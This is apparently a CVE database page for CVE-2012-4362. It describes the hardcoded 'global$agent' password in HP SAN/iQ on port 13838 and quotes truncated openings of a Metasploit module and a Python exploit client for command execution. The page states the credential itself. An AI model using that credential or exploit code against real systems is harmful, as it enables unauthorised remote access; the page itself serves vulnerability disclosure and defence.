CVE-2012-4362
published 2012-08-20CVE-2012-4362: hydra.exe in HP SAN/iQ before 9.5 on the HP Virtual SAN Appliance has a hardcoded password of L0CAlu53R for the global$agent account, which allows remote…
PriorityP431medium4CVSS 2.0
AVNACLAuSCNIPAN
EXPLOIT
EPSS
3.20%
86.5th percentile
hydra.exe in HP SAN/iQ before 9.5 on the HP Virtual SAN Appliance has a hardcoded password of L0CAlu53R for the global$agent account, which allows remote attackers to obtain access to a management service via a login: request to TCP port 13838.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | san_iq | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
exploitdb·2012-05-21
CVE-2012-4362 HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
'Description' => %q{
This module exploits a vulnerability found in HP's StorageWorks P4000 VSA,
versions prior to 9.5. By using a default account credential, it is possible
to inject arbitrary commands as part of a ping request via port 13838.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Gregoire', #Discovery, PoC, additional assistance
'sinn3r' #M
Exploit-DB
HP VSA - Remote Command Execution
exploitdb·2012-02-17
CVE-2012-4362 HP VSA - Remote Command Execution
HP VSA - Remote Command Execution
---
#!/usr/bin/python
''' ==================================
Pseudo documentation
================================== '''
# HP VSA / SANiQ Hydra client
# Nicolas Grégoire
# v0.5
''' ==================================
Target information
================================== '''
HOST = '192.168.201.11' # The remote host
PORT = 13838 # The hydra port
''' ==================================
Imports
================================== '''
import getopt
import re
import sys
import binascii
import struct
import socket
import os
''' ==================================
Define functions
================================== '''
# Some nice formatting
def zprint(str):
print '[=] ' + str
# Define packets
def send_Exec():
zprint('Send Exec')
# RESTRICTIONS
# You can'
No writeups or analysis indexed.
2012-08-20
Published